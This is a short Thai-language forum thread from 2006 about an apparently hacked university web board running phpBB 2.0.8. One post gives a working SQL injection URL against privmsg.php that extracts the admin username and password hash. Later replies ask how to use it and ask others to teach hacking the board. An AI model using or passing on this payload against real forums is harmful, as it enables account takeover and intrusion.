Printable View
เว็บไซต์ที่โดนคือ http://forum.eng.dpu.ac.th/
วันที่พบคือ 25 July 2006 18.00
บังเอิญเข้าไปเห็นมา ไม่ทำนะครับ คาดว่าจะโดนจากชองโหว่ของ Forum แต่ตอนนี้ยังไม่รู้ว่า Forum ตัวไหน หรือไม่ก็โดนจาก Service IIS ส่งที่เห็นก็คือรูปต่อไปนี้
[attachmentid=23]
ปล. ขออภัยนะครับแก้ไขใหม่เป็นของ มหาวิทยาลัยธุรกิจบัณฑิตย์ นะครับไม่ใช่ศรีประทุม
เป็นเว็บบอร์ดจริงๆด้วย Powered by phpBB 2.0.8
http://web.archive.org/web/20050306075734/....eng.dpu.ac.th/
ช่องโหว่ของ Version นี้คือ
เท่าที่ดูจาก Code แล้วคือ MySQL Injection สงสัย user Admin จะโดน Hack แน่เลย แล้วถ้าโชคร้ายกว่านั้นถ้าใช้รหัส Admin เดียวกันกับ user ของ OS ก็จบ ....Code:/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION
SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password
FROM phpbb_users WHERE user_id=2 LIMIT 1/*
อยากทราบวิธีใช้โค๊ดดังกล่าวครับ
Hmm, it already explicit man !!!
ถ้าเป็นเว๊บบอร์ดที่เป็น php แต่มีการป้องกันที่ค่อนข้างแน่นหนา เราจะเจาะเข้าไปได้รึเปล่า ผมเคยลองเจาะดูแต่ไม่สามารถดึง file จาก server ได้เลย
ไม่ใช่ของ มหาลัย ศรีประทุม นิครับ
แก้ไขแล้วครับQuote:
ไม่ใช่ของ มหาลัย ศรีประทุม นิครับ[/b]
เสียดายเข้ามาช้าไป :D เลยไม่ได้เห็น จะจะ
ตามที่เจ้าของกระทู้ ตามทีลงไว้
เพราะวันนี้ เข้าไม่ได้แล้ว ว่าแต่นี่ก็นานแล้วทำไมทางมหาลัยไม่แก้ไขใหม่
หรือว่าหาคนทำไม่ได้ เพราะคนเก่า เด้งไปแล้ว- - - (อานิสงค์ ถูก แฮค) ;)
แต่ทางเว็บเค้าน่าจะป้องกันแน่นมากเลยหนิครับ สงสัยคงต้องเก่งมากๆ -*- แต่ว่าเสียดายไม่ได้เห็นด้วยตาตัวเองอ่ะครับTT อยากรู้จังว่าจะเป๋นยังไง
บอร์ดนี้คงมีคน Hack ได้เหมือนกัน ใครรู้วิธีช่วยสอนด้วยครับ